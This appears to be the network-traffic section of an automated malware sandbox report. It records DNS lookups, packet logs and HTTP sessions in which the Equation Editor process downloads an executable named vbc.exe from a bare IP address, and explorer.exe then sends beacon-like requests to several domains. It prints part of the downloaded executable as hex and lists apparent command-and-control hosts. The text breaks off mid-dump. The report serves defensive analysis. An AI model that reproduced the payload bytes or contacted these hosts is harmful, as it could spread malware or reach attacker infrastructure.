Nov 25, 2021 19:27:42.321516991 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.460961103 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.461112976 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.461473942 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.600879908 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952476978 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952533960 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952574015 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952613115 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952650070 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952672958 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.952688932 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952701092 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.952728033 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952740908 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.952764988 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952804089 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952814102 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:42.952841997 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:42.952893972 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:43.092233896 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092268944 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092293978 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092315912 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092336893 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092338085 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:43.092360973 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092360973 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:43.092385054 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:43.092411041 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:43.092569113 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:43.092696905 CET	49170	80	192.168.2.22	108.167.189.66
Nov 25, 2021 19:27:43.231935978 CET	80	49170	108.167.189.66	192.168.2.22
Nov 25, 2021 19:27:53.262087107 CET	49172	80	192.168.2.22	34.102.136.180
Nov 25, 2021 19:27:53.284193039 CET	80	49172	34.102.136.180	192.168.2.22
Nov 25, 2021 19:27:53.284318924 CET	49172	80	192.168.2.22	34.102.136.180
Nov 25, 2021 19:27:53.284538031 CET	49172	80	192.168.2.22	34.102.136.180
Nov 25, 2021 19:27:53.306258917 CET	80	49172	34.102.136.180	192.168.2.22
Nov 25, 2021 19:27:53.403893948 CET	80	49172	34.102.136.180	192.168.2.22
Nov 25, 2021 19:27:53.403942108 CET	80	49172	34.102.136.180	192.168.2.22
Nov 25, 2021 19:27:53.404129982 CET	49172	80	192.168.2.22	34.102.136.180
Nov 25, 2021 19:27:53.404251099 CET	49172	80	192.168.2.22	34.102.136.180
Nov 25, 2021 19:27:53.705101013 CET	49172	80	192.168.2.22	34.102.136.180
Nov 25, 2021 19:27:53.727123022 CET	80	49172	34.102.136.180	192.168.2.22
Nov 25, 2021 19:27:58.533792973 CET	49173	80	192.168.2.22	151.101.66.159
Nov 25, 2021 19:27:58.549573898 CET	80	49173	151.101.66.159	192.168.2.22
Nov 25, 2021 19:27:58.549652100 CET	49173	80	192.168.2.22	151.101.66.159
Nov 25, 2021 19:27:58.549930096 CET	49173	80	192.168.2.22	151.101.66.159
Nov 25, 2021 19:27:58.565365076 CET	80	49173	151.101.66.159	192.168.2.22
Nov 25, 2021 19:27:58.566992998 CET	80	49173	151.101.66.159	192.168.2.22
Nov 25, 2021 19:27:58.567030907 CET	80	49173	151.101.66.159	192.168.2.22
Nov 25, 2021 19:27:58.567059040 CET	80	49173	151.101.66.159	192.168.2.22
Nov 25, 2021 19:27:58.567132950 CET	49173	80	192.168.2.22	151.101.66.159
Nov 25, 2021 19:27:58.567156076 CET	49173	80	192.168.2.22	151.101.66.159
Nov 25, 2021 19:27:58.567231894 CET	49173	80	192.168.2.22	151.101.66.159
Nov 25, 2021 19:27:58.582597971 CET	80	49173	151.101.66.159	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 19:27:31.200841904 CET	52167	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:27:31.222560883 CET	53	52167	8.8.8.8	192.168.2.22
Nov 25, 2021 19:27:36.288364887 CET	50591	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:27:36.616163015 CET	53	50591	8.8.8.8	192.168.2.22
Nov 25, 2021 19:27:42.107682943 CET	57805	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:27:42.319514036 CET	53	57805	8.8.8.8	192.168.2.22
Nov 25, 2021 19:27:48.133411884 CET	59030	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:27:48.195972919 CET	53	59030	8.8.8.8	192.168.2.22
Nov 25, 2021 19:27:53.214838028 CET	59185	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:27:53.261198997 CET	53	59185	8.8.8.8	192.168.2.22
Nov 25, 2021 19:27:58.458398104 CET	55616	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:27:58.531814098 CET	53	55616	8.8.8.8	192.168.2.22
Nov 25, 2021 19:28:03.570483923 CET	49972	53	192.168.2.22	8.8.8.8
Nov 25, 2021 19:28:03.599400043 CET	53	49972	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 19:27:31.200841904 CET	192.168.2.22	8.8.8.8	0xc18c	Standard query (0)	www.noyoucantridemyonewheel.com	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:36.288364887 CET	192.168.2.22	8.8.8.8	0xfc43	Standard query (0)	www.deboraverdian.com	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:42.107682943 CET	192.168.2.22	8.8.8.8	0x9c63	Standard query (0)	www.franquiciasexclusivas.tienda	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:48.133411884 CET	192.168.2.22	8.8.8.8	0x30e0	Standard query (0)	www.digipoint-entertainment.com	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:53.214838028 CET	192.168.2.22	8.8.8.8	0x9037	Standard query (0)	www.hacticum.com	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:58.458398104 CET	192.168.2.22	8.8.8.8	0xce43	Standard query (0)	www.trashwasher.com	A (IP address)	IN (0x0001)
Nov 25, 2021 19:28:03.570483923 CET	192.168.2.22	8.8.8.8	0xb02b	Standard query (0)	www.getjoyce.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 19:27:31.222560883 CET	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.noyoucantridemyonewheel.com	noyoucantridemyonewheel.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 19:27:31.222560883 CET	8.8.8.8	192.168.2.22	0xc18c	No error (0)	noyoucantridemyonewheel.com		192.0.78.25	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:31.222560883 CET	8.8.8.8	192.168.2.22	0xc18c	No error (0)	noyoucantridemyonewheel.com		192.0.78.24	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:36.616163015 CET	8.8.8.8	192.168.2.22	0xfc43	No error (0)	www.deboraverdian.com	deboraverdian.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 19:27:36.616163015 CET	8.8.8.8	192.168.2.22	0xfc43	No error (0)	deboraverdian.com		151.106.119.46	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:42.319514036 CET	8.8.8.8	192.168.2.22	0x9c63	No error (0)	www.franquiciasexclusivas.tienda		108.167.189.66	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:48.195972919 CET	8.8.8.8	192.168.2.22	0x30e0	Name error (3)	www.digipoint-entertainment.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:53.261198997 CET	8.8.8.8	192.168.2.22	0x9037	No error (0)	www.hacticum.com	hacticum.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 19:27:53.261198997 CET	8.8.8.8	192.168.2.22	0x9037	No error (0)	hacticum.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 25, 2021 19:27:58.531814098 CET	8.8.8.8	192.168.2.22	0xce43	No error (0)	www.trashwasher.com	trashwasher.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 19:27:58.531814098 CET	8.8.8.8	192.168.2.22	0xce43	No error (0)	trashwasher.com		151.101.66.159	A (IP address)	IN (0x0001)
Nov 25, 2021 19:28:03.599400043 CET	8.8.8.8	192.168.2.22	0xb02b	Name error (3)	www.getjoyce.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

107.173.229.133

www.noyoucantridemyonewheel.com

www.deboraverdian.com

www.franquiciasexclusivas.tienda

www.hacticum.com

www.trashwasher.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	107.173.229.133	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:26:21.837522030 CET	0	OUT	GET /90009/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.173.229.133 Connection: Keep-Alive
Nov 25, 2021 19:26:21.956288099 CET	1	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 18:26:21 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25 Last-Modified: Thu, 25 Nov 2021 07:58:32 GMT ETag: "6c800-5d19857437223" Accept-Ranges: bytes Content-Length: 444416 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 42 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 be 06 00 00 08 00 00 00 00 00 00 36 dc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 db 06 00 4f 00 00 00 00 e0 06 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c bc 06 00 00 20 00 00 00 be 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 e0 06 00 00 06 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 07 00 00 02 00 00 00 c6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 dc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 14 76 00 00 03 00 00 00 93 00 00 06 bc db 00 00 28 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(Ba06 @ @O H.textL `.rsrc@@.reloc@BHev({ {!{"{#($} }!}"}#0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o,(+{#{#o,++0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X0rp%{ %q-&+o1%{!%q-&+o1
Nov 25, 2021 19:26:21.956321955 CET	3	IN	Data Raw: 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00 00 1b 6f 31 00 00 0a a2 28 32 Data Ascii: %{"%q-&+o1%{#%q-&+o1(2b(o~(3>~(3>~(4.(3.(40N(5tP%%%%%%(6
Nov 25, 2021 19:26:21.956343889 CET	4	IN	Data Raw: 02 28 24 00 00 0a 00 00 2a 00 13 30 01 00 0c 00 00 00 0f 00 00 11 00 02 7b 06 00 00 04 0a 2b 00 06 2a 13 30 02 00 1b 00 00 00 10 00 00 11 00 02 7b 06 00 00 04 03 28 3a 00 00 0a 0a 06 2c 09 00 02 03 7d 06 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 Data Ascii: ($0{+0{(:,}0{+0{,}0{+0{(:,}0{+0{
Nov 25, 2021 19:26:21.956367016 CET	5	IN	Data Raw: 00 00 04 0a 2b 00 06 2a 13 30 02 00 1b 00 00 00 10 00 00 11 00 02 7b 18 00 00 04 03 28 3a 00 00 0a 0a 06 2c 09 00 02 03 7d 18 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 0f 00 00 11 00 02 7b 19 00 00 04 0a 2b 00 06 2a 13 30 02 00 1b 00 00 00 10 00 Data Ascii: +0{(:,}0{+0{(:,}0{+0<{(;(;(<(<_,}0{+*0<
Nov 25, 2021 19:26:22.070780039 CET	7	IN	Data Raw: 04 03 28 3a 00 00 0a 0a 06 2c 09 00 02 03 7d 2a 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 12 00 00 11 00 02 7b 2b 00 00 04 0a 2b 00 06 2a 13 30 03 00 3c 00 00 00 13 00 00 11 00 02 7b 2b 00 00 04 0b 03 0c 12 01 28 3b 00 00 0a 12 02 28 3b 00 00 0a Data Ascii: (:,}*0{++0<{+(;(;(<(<_,}+0{,+0<{,(;(;(<(<_,},0{-+0
Nov 25, 2021 19:26:22.070812941 CET	8	IN	Data Raw: 0a 00 00 2a 13 30 02 00 23 00 00 00 1a 00 00 11 00 7e 3a 00 00 04 14 fe 01 0a 06 2c 0c 00 73 a3 00 00 06 80 3a 00 00 04 00 7e 3a 00 00 04 0b 2b 00 07 2a 00 1b 30 08 00 d3 01 00 00 1b 00 00 11 00 02 7b 3b 00 00 04 6f 21 00 00 06 d0 0e 00 00 02 28 Data Ascii: 0#~:,s:~:+0{;o!(Brp(IJ(KtXV%(LtP(M%(LtP(M%(LtP(M%(LtP(MZ%N(Kt
Nov 25, 2021 19:26:22.070841074 CET	10	IN	Data Raw: 72 d3 01 00 70 28 49 00 00 0a 0c d0 21 00 00 02 28 42 00 00 0a 28 5b 00 00 0a 1b 8d 62 00 00 01 25 16 d0 3b 01 00 06 28 4c 00 00 0a 74 50 00 00 01 08 d0 5c 00 00 06 28 4c 00 00 0a 74 50 00 00 01 28 4d 00 00 0a 28 5c 00 00 0a a2 25 17 d0 41 01 00 Data Ascii: rp(I!(B([b%;(LtP\(LtP(M(\%A(LtP^(LtP(MQ(B(](\%=(LtPb(LtP(M(\%9(LtPZ(LtP(M(\%?(LtPd
Nov 25, 2021 19:26:22.070871115 CET	11	IN	Data Raw: 6f 60 00 00 0a 00 2a 00 13 30 01 00 0f 00 00 00 20 00 00 11 00 73 0a 01 00 06 0a 06 6f 60 00 00 0a 00 2a 00 13 30 01 00 0f 00 00 00 21 00 00 11 00 73 c2 00 00 06 0a 06 6f 60 00 00 0a 00 2a 00 13 30 08 00 91 00 00 00 22 00 00 11 00 14 0a 02 7b 3b Data Ascii: o`0 so`0!so`0"{;o8o(Brp(I (B([b%2(LtP.(LtP(M(\(^1%(+(+(++0"{;
Nov 25, 2021 19:26:22.070902109 CET	12	IN	Data Raw: 7b 41 00 00 04 6f 64 00 00 0a 0b 02 7b 44 00 00 04 6f 64 00 00 0a 0c 02 7b 46 00 00 04 6f 64 00 00 0a 0d 02 7b 4b 00 00 04 6f 64 00 00 0a 13 04 11 04 28 65 00 00 0a 13 05 02 7b 4c 00 00 04 6f 64 00 00 0a 13 06 11 06 28 65 00 00 0a 13 07 02 7b 3e Data Ascii: {Aod{Dod{Fod{Kod(e{Lod(e{>o(f&(f0-{M,+}Mrps>(g0.YE"3DUfw
Nov 25, 2021 19:26:22.070926905 CET	14	IN	Data Raw: 04 02 7b 58 00 00 04 02 fe 06 d7 00 00 06 73 71 00 00 0a 6f 72 00 00 0a 00 2b 2d 02 04 74 38 00 00 01 7d 59 00 00 04 02 7b 59 00 00 04 02 fe 06 d6 00 00 06 73 68 00 00 0a 6f 6c 00 00 0a 00 2b 07 02 17 7d 5a 00 00 04 2a 00 00 00 13 30 01 00 0c 00 Data Ascii: {Xsqor+-t8}Y{Yshol+}Z02{\+03}\{a{\o8o1os{b{\o:os{c{\o<os{d{\o>os{g{\o@(to
Nov 25, 2021 19:26:22.070946932 CET	15	IN	Data Raw: 00 00 04 02 fe 06 e6 00 00 06 73 68 00 00 0a 6f 6c 00 00 0a 00 38 bb 00 00 00 02 04 74 38 00 00 01 7d 70 00 00 04 02 7b 70 00 00 04 02 fe 06 e5 00 00 06 73 68 00 00 0a 6f 6c 00 00 0a 00 38 92 00 00 00 02 04 74 37 00 00 01 7d 71 00 00 04 38 81 00 Data Ascii: shol8t8}p{pshol8t7}q8t6}r{rsjok+[t6}s+Mt6}t+?t6}u+1t7}v+#t7}w+t7}x+}y*(}z(c((

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:27:31.255728006 CET	471	OUT	GET /ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 Host: www.noyoucantridemyonewheel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 19:27:31.272551060 CET	472	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 25 Nov 2021 18:27:31 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.noyoucantridemyonewheel.com/ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR X-ac: 2.hhn _dfw Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	151.106.119.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:27:36.861370087 CET	473	OUT	GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 Host: www.deboraverdian.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 19:27:37.103225946 CET	474	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Thu, 25 Nov 2021 18:27:36 GMT server: LiteSpeed location: https://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR x-powered-by: Niagahoster vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	108.167.189.66	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:27:42.461473942 CET	475	OUT	GET /ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 Host: www.franquiciasexclusivas.tienda Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 19:27:42.952476978 CET	476	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 18:27:42 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 65 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 